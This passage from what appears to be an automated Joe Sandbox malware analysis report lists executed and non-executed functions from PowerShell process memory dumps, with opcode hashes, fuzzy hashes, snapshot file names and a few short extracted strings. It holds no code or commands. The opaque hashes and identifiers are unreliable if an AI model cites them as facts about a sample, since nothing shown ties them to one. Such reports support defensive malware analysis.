                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ea5cecf7930bfb67bd2246ffbea690bebeb6b4d5dafad5773f6672debfeddc98
                                                                          • Instruction ID: 52397c90d5205bcee340d62161df5cb4a8f761ee108c3e2aeb29db9332db90ed
                                                                          • Opcode Fuzzy Hash: ea5cecf7930bfb67bd2246ffbea690bebeb6b4d5dafad5773f6672debfeddc98
                                                                          • Instruction Fuzzy Hash: E041257150DBC44FEB569B289895A523FF0EF53220F1905EFD088CB1A3D629A846C792
                                                                          Function 00007FFD34769768 Relevance: .1, Instructions: 124COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2570274190.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34760000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d860cc6bd76c46d9e21b71097e23c617f46766b333def9518bfbabcb424eae9f
                                                                          • Instruction ID: 19a4ab168585e6f9beda6dc2449c71666d7cbde0976e375b17847862b630bec7
                                                                          • Opcode Fuzzy Hash: d860cc6bd76c46d9e21b71097e23c617f46766b333def9518bfbabcb424eae9f
                                                                          • Instruction Fuzzy Hash: C031E671A1CB488FDB589F5C98466A9BBE1FB99710F00422FE449D3251CB74A856CBC2
                                                                          Function 00007FFD3476A47C Relevance: .1, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2570274190.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34760000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: be0c880155a102b36f90606c4ca009db1b00b24aa20655401aa63686c8734149
                                                                          • Instruction ID: a1d88df42c186d0c15de56fbab2666f572ad4f1152f13d29381d0a37c3edf38d
                                                                          • Opcode Fuzzy Hash: be0c880155a102b36f90606c4ca009db1b00b24aa20655401aa63686c8734149
                                                                          • Instruction Fuzzy Hash: 49213A3090C74C8FDB59DFAC988A7E97FF0EB96321F04416BD448C3152DA74A41ACB91
                                                                          Function 00007FFD3483414D Relevance: .1, Instructions: 90COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2572986398.00007FFD34830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34830000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34830000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0cffc6bfa227ba059ed6b2b3ccda4505eacdc18a763d3e3001235ec59cfb22be
                                                                          • Instruction ID: 1fe851907cd845edea5a0c3cef5a8d766bad0cc04af7c7821adef9f87e4a8d1d
                                                                          • Opcode Fuzzy Hash: 0cffc6bfa227ba059ed6b2b3ccda4505eacdc18a763d3e3001235ec59cfb22be
                                                                          • Instruction Fuzzy Hash: B821C23270CE184FEB68EB5CA4615E8B3E1EF59730B1400BBD24AC32A3DA25EC45C780
                                                                          Function 00007FFD34834400 Relevance: .1, Instructions: 86COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2572986398.00007FFD34830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34830000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34830000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6eea28d22afc7540b4ccb5b4664e85a3ea90e9b369843558fb2763ebef22adff
                                                                          • Instruction ID: f0c1ddc035c738ab8b00a640c5d38c5d63fbb8132969de7a6c62cfdf7fa55684
                                                                          • Opcode Fuzzy Hash: 6eea28d22afc7540b4ccb5b4664e85a3ea90e9b369843558fb2763ebef22adff
                                                                          • Instruction Fuzzy Hash: F821D83270CA484FEB64EB5CA4A15E8B7E1EF45734B1400BBD24AC7293DA29EC55C790
                                                                          Function 00007FFD3483681E Relevance: .1, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2572986398.00007FFD34830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34830000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34830000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c7abd7b0912acf97a3e49d93c0913e719c23941a70f9d5e4a9981dd2923cf319
                                                                          • Instruction ID: 5a48768d0539474434fac9a643a79e9542f2a49cafba2107fa9c2740b73c2f93
                                                                          • Opcode Fuzzy Hash: c7abd7b0912acf97a3e49d93c0913e719c23941a70f9d5e4a9981dd2923cf319
                                                                          • Instruction Fuzzy Hash: E4110672B0D6894FEBA1DF9C80F41A877D1EF5A310B1440BFC64DE7293CA29A845D310
                                                                          Function 00007FFD347633B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2570274190.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34760000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                          • Instruction ID: 9673819b57db3391d7149ca44187bfcecfbd052572aa48069badb64473713da4
                                                                          • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                          • Instruction Fuzzy Hash: 7C01677121CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E882CB45
                                                                          Function 00007FFD3476344F Relevance: .0, Instructions: 34COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2570274190.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34760000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b31156f07946ad7d640a263aa191d2e91d66259d3623d542f74b6115bd25657e
                                                                          • Instruction ID: 39b78ea669a075442a64c42f38547fe699d342af8c87772c6d507f665621dd86
                                                                          • Opcode Fuzzy Hash: b31156f07946ad7d640a263aa191d2e91d66259d3623d542f74b6115bd25657e
                                                                          • Instruction Fuzzy Hash: 71F0A07260C7094FEB588E0CE4925B577D0EB42230B00022FE98AC6092DA2AA483C785

                                                                          Non-executed Functions

                                                                          Function 00007FFD34768BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2570274190.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34760000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: O_^4$O_^7$O_^F$O_^J
                                                                          • API String ID: 0-875994666
                                                                          • Opcode ID: 2e885493dd975bc32d340c5768cef525a19cc6b18a019490f26335b263fa7f1c
                                                                          • Instruction ID: 7c7316b1a101c5f5dd5a0d207d5e788d8146766051ad64cc11732bb99fd3bf2d
                                                                          • Opcode Fuzzy Hash: 2e885493dd975bc32d340c5768cef525a19cc6b18a019490f26335b263fa7f1c
                                                                          • Instruction Fuzzy Hash: 262126FB718826AFD3117BBDB8155EE3744CFD623A34502B2D19E9F243E914709A8AD0

                                                                          Executed Functions

                                                                          Function 00007FFD347A6435 Relevance: .7, Instructions: 726COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2617146239.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd347a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dd470a3995d4fb299f7d10febb65859770713eece3a0aa0df3d30694e144b3d4
                                                                          • Instruction ID: 4c0feed17aba1824c3f0dad16fd47ffce92c8dff76f64a5604d31c2e20b2bedf
                                                                          • Opcode Fuzzy Hash: dd470a3995d4fb299f7d10febb65859770713eece3a0aa0df3d30694e144b3d4
                                                                          • Instruction Fuzzy Hash: DDD18070A18A4D8FDF94DF58C4A5AA977F1FF69300F14416AD449D72A6CA38F881CBC1
                                                                          Function 00007FFD3468ED40 Relevance: .1, Instructions: 126COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2613179447.00007FFD3468D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3468D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd3468d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3fc965c1e5b55aefa61283f82d31b524b7412c011f76bc01205b95dbeccabae1
                                                                          • Instruction ID: ae96de83d47391901b54d1085105472e2b8b758800658767e45cae8d64f96b5b
                                                                          • Opcode Fuzzy Hash: 3fc965c1e5b55aefa61283f82d31b524b7412c011f76bc01205b95dbeccabae1
                                                                          • Instruction Fuzzy Hash: 0941F57180DBC44FE7969B28D8959923FF0EF57320B1905DFD488CB1A3D629A84AC793
                                                                          Function 00007FFD347A97A9 Relevance: .1, Instructions: 110COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2617146239.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd347a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1382dd9d7f37789dd679ea548ca36e8fdb063b499b80f061b4dac3400356ad09
                                                                          • Instruction ID: 78740e07156033ff32ed8c3ec7138d1c8454b7ebd80c5bf9c2f4a7dd3151bf8c
                                                                          • Opcode Fuzzy Hash: 1382dd9d7f37789dd679ea548ca36e8fdb063b499b80f061b4dac3400356ad09
                                                                          • Instruction Fuzzy Hash: F931A431A1CB4C9FDB1CDB5CA84A6A9BBE0FB99711F00422FE449D3251CB70A855CBC2
                                                                          Function 00007FFD347AA49C Relevance: .1, Instructions: 101COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2617146239.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd347a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fea041103a57bc3e2c4a69a69166bfd142e25a83ed93bcd1ce9815bd5f4a6b07
                                                                          • Instruction ID: 35a2aa821d22b4f32a861be7d46d7058b6517f91547102707e294ecc25ae8385
                                                                          • Opcode Fuzzy Hash: fea041103a57bc3e2c4a69a69166bfd142e25a83ed93bcd1ce9815bd5f4a6b07
                                                                          • Instruction Fuzzy Hash: D121093190C78C4FDB59DBAC9C4A6E97FE0EB56321F04416BD048C3152D674A81AC791
                                                                          Function 00007FFD3487681E Relevance: .1, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2620058435.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34870000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3dbdabca2f69e81aafe9d2829a3174e00833981f861073ac855503f6390bee84
                                                                          • Instruction ID: c0fa3a2db94a78435be43aa47d769539a4f80437ffdbf569700352de81a5260e
                                                                          • Opcode Fuzzy Hash: 3dbdabca2f69e81aafe9d2829a3174e00833981f861073ac855503f6390bee84
                                                                          • Instruction Fuzzy Hash: 6A110632B0D6894FEB91DF9894F41A87BD1EF5A220B0441BEC54DE7193CA3DA845E350
                                                                          Function 00007FFD347A33B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2617146239.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd347a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                          • Instruction ID: 0a84c860f013be5360dc54d427524c8b7572197af3ada10ad28df495537e80d8
                                                                          • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                          • Instruction Fuzzy Hash: 2501677121CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E882CB45
                                                                          Function 00007FFD3487414D Relevance: .0, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2620058435.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34870000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a696b47bde92ef0e00d6b383c8105af4f860c883da688ccc937b22cbf0ef8d72
                                                                          • Instruction ID: 80d6aa4646295b5ca92b6a66cad14aaa423f26a701a8e64617c627c10a343965
                                                                          • Opcode Fuzzy Hash: a696b47bde92ef0e00d6b383c8105af4f860c883da688ccc937b22cbf0ef8d72
                                                                          • Instruction Fuzzy Hash: EFF09A32B0C9448FD7A8EB4CE8A04A877E1EF5636071140BAE29DC7563CA29EC40C790
                                                                          Function 00007FFD34874400 Relevance: .0, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2620058435.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34870000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5596708de90ac53f609d067ff1fd46c7a8521a6c96b6e2cba420e57f94e846bf
                                                                          • Instruction ID: 101a74af18f6d41723a9f39376eb31d162845993d8be3272c9726b50ef916865
                                                                          • Opcode Fuzzy Hash: 5596708de90ac53f609d067ff1fd46c7a8521a6c96b6e2cba420e57f94e846bf
                                                                          • Instruction Fuzzy Hash: F0F0BE32A4D5448FD794EB4CE8A04A877E0FF0672474140B6E29DDB563DA29AC40D790
                                                                          Function 00007FFD348741D1 Relevance: .0, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2620058435.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34870000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                          • Instruction ID: bd9a4ed723fb6972c27f1df6bfa7c04d82bb614e94ade7679d558c9943ce9f6d
                                                                          • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                          • Instruction Fuzzy Hash: 72E04F31B0C8188FDA68EB0CE4A09E977E5EF9937171141B7D28EC7561CA36EC51EB90

                                                                          Non-executed Functions

                                                                          Function 00007FFD347A8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2617146239.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd347a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: K_^4$K_^7$K_^F$K_^J
                                                                          • API String ID: 0-377281160
                                                                          • Opcode ID: 1337c1854dd59eb83ea9a8eb30e63dcf3290b25af5210be026440cbc330f0a7a
                                                                          • Instruction ID: a9df2db955e23b3f35e66654de59260e4ad61196ecaeb889a9e2e5a958b0a231
                                                                          • Opcode Fuzzy Hash: 1337c1854dd59eb83ea9a8eb30e63dcf3290b25af5210be026440cbc330f0a7a
                                                                          • Instruction Fuzzy Hash: 292135F77089266FD7127BBCB8555EE3BA4CF9927834502B3D198DB013E914B09B8AC0

                                                                          Executed Functions

                                                                          Function 00007FFD3467ED40 Relevance: .1, Instructions: 126COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000C.00000002.2372767588.00007FFD3467D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3467D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_12_2_7ffd3467d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 534390dc9b8e64d26bd0cdcee45483cdfacb22c65ad74cfbed81522340573105
                                                                          • Instruction ID: cf695cdd91c70c7d53ec555392de8758405e7422ed5dd6954b6055dd0ff8944c
                                                                          • Opcode Fuzzy Hash: 534390dc9b8e64d26bd0cdcee45483cdfacb22c65ad74cfbed81522340573105
                                                                          • Instruction Fuzzy Hash: D841047040DBC44FE7569F28DC959963FF0EF57220B1946DFD088CB1A3D629A84AC7A2
                                                                          Function 00007FFD34799789 Relevance: .1, Instructions: 110COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000C.00000002.2374397177.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_12_2_7ffd34790000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a6011aa679100adccb18649eab08ddb22c28bed60ac5f9a6735cf8e83c858a72
                                                                          • Instruction ID: 5a43b3f83457cbdb8947b4e45eceecf6e97260d24d96343ff8fa6a6829231e84
                                                                          • Opcode Fuzzy Hash: a6011aa679100adccb18649eab08ddb22c28bed60ac5f9a6735cf8e83c858a72
                                                                          • Instruction Fuzzy Hash: 6631737091CB4C9FDB58DB5CE84A6A97BE0FB99711F00422FE449D3251CB71A8558BC2
                                                                          Function 00007FFD3479A62C Relevance: .1, Instructions: 103COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000C.00000002.2374397177.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_12_2_7ffd34790000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6d2b51f6f23ce4e00ef449c3f86674d4bb5771062c8572e4a42eee5a4725ba2c
                                                                          • Instruction ID: 6ab17142f9f8fb3938c2552b7adaa1da4837da3387f64e83a3352db6bc4add7b
                                                                          • Opcode Fuzzy Hash: 6d2b51f6f23ce4e00ef449c3f86674d4bb5771062c8572e4a42eee5a4725ba2c
                                                                          • Instruction Fuzzy Hash: 8821E67090CB4C8FDB59DBA8984A6E97FE0EB56321F04426BD049C3152DA74A816CBA2
                                                                          Function 00007FFD3486681E Relevance: .1, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000C.00000002.2376425796.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_12_2_7ffd34860000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6e1e59b40c16b804b51e6146eb3277c1ba8df682b07486494f754fe059b3ac8c
                                                                          • Instruction ID: 98fad953d66dabd0d1d37db0c188a9db8b82f0f86909cd687e316019b52a038d
                                                                          • Opcode Fuzzy Hash: 6e1e59b40c16b804b51e6146eb3277c1ba8df682b07486494f754fe059b3ac8c
                                                                          • Instruction Fuzzy Hash: 9C110632B0DAC94FEB91DFA890E45A877D1EF5A220B4441BEC64DE7193CE2DA845D350
                                                                          Function 00007FFD347933B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000C.00000002.2374397177.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_12_2_7ffd34790000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                          • Instruction ID: 7f35bd5044578bf9c0f8abe52516a2319000a2064556ee323e06116b507f2bf6
                                                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                          • Instruction Fuzzy Hash: 6701677125CB0C8FD744EF0CE451AA5B7E0FB99364F10056DE58AC3651DA36E882CB45
                                                                          Function 00007FFD3486414D Relevance: .0, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000C.00000002.2376425796.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_12_2_7ffd34860000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5ccd98f4549170330db1c2c99e8cbdb248738b512efa01cb972bd844a0efe490
                                                                          • Instruction ID: d035231d26e64e3ab9f909a87b334af7f4265c8666c58b787efe53bc43a1c3f1
                                                                          • Opcode Fuzzy Hash: 5ccd98f4549170330db1c2c99e8cbdb248738b512efa01cb972bd844a0efe490
                                                                          • Instruction Fuzzy Hash: 57F0BE32B0C9448FD7A9EB4CE4904E873E1EF5633075100BAE25DCB563CA29EC40CB84
                                                                          Function 00007FFD34864400 Relevance: .0, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000C.00000002.2376425796.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_12_2_7ffd34860000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2f391cd3648521b286ff4fd1151afa543891bc47b5e6405cbba18cf5154ec560
                                                                          • Instruction ID: 24bbbc643bf75c45909b9eff55c67ac5cbcf50787e5ce65c8fd4ae2c5d007a82
                                                                          • Opcode Fuzzy Hash: 2f391cd3648521b286ff4fd1151afa543891bc47b5e6405cbba18cf5154ec560
                                                                          • Instruction Fuzzy Hash: A2F0BE32A0D5448FD795EB4CE0914E873E0FF06724B8100B6E24DCB563DA2AAC40C790
                                                                          Function 00007FFD348641D1 Relevance: .0, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000C.00000002.2376425796.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_12_2_7ffd34860000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                          • Instruction ID: ee9586f07496c1bd1986fd336a253b726326e321646279f7fa3f18427cd421a5
                                                                          • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                          • Instruction Fuzzy Hash: 56E01A31B0C8188FDAA8DB0CE0909ED73E1EB9933175101B7D24EC7561CA2AEC519B84

                                                                          Non-executed Functions

                                                                          Function 00007FFD34798995 Relevance: 5.1, Strings: 4, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000C.00000002.2374397177.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_12_2_7ffd34790000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L_^$L_^$L_^$L_^
                                                                          • API String ID: 0-2357752022
                                                                          • Opcode ID: f30e54de0ffa842bdc6bf3dab58cd4b347e72fb9659f61730a2b9c74b80a6a10
                                                                          • Instruction ID: cf782fa72f43ac41a017fe7313ae504fcc83cc30c869c7516089a9f9cd6657c4
                                                                          • Opcode Fuzzy Hash: f30e54de0ffa842bdc6bf3dab58cd4b347e72fb9659f61730a2b9c74b80a6a10
                                                                          • Instruction Fuzzy Hash: BD4169E3A1D6C25FE36646295CB60D97F95EF53324B0E11F7C285CB093EE1D280B9292
                                                                          Function 00007FFD34798BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000C.00000002.2374397177.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_12_2_7ffd34790000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L_^4$L_^7$L_^F$L_^J
                                                                          • API String ID: 0-3225005683
                                                                          • Opcode ID: 8102688ab214c8cdd39813c713289ae0ebbb44b5a4c555a5b4d77903fd85f6ad
                                                                          • Instruction ID: 443b2aa078ec86e58260c0e43e9e1caa0695d1715e2cf29a0d7621581b0329fa
                                                                          • Opcode Fuzzy Hash: 8102688ab214c8cdd39813c713289ae0ebbb44b5a4c555a5b4d77903fd85f6ad
                                                                          • Instruction Fuzzy Hash: F92123B77088266FD3127BFDB8165FE3744CF9523834552B2D2989B003EA14709A8AE0

                                                                          Executed Functions

                                                                          Function 00007FFD3478B3D3 Relevance: 1.4, Strings: 1, Instructions: 198COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2977501725.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd34780000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ^R_L
                                                                          • API String ID: 0-669454707
                                                                          • Opcode ID: 2693991f226b519d4ff39fa5eb670bf771986e025d6f0cfc001514e8bb60ce9f
                                                                          • Instruction ID: 1dc7eaf10f3edc46e5c2c1e26168b52458f95f981c6111c08c5cec2c42c89745
                                                                          • Opcode Fuzzy Hash: 2693991f226b519d4ff39fa5eb670bf771986e025d6f0cfc001514e8bb60ce9f
                                                                          • Instruction Fuzzy Hash: 9B515C7160CB888FD798DB6C9886AB57BE0EB97321F14016EE1DAC3157D929F407C781
                                                                          Function 00007FFD3478604D Relevance: .4, Instructions: 393COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
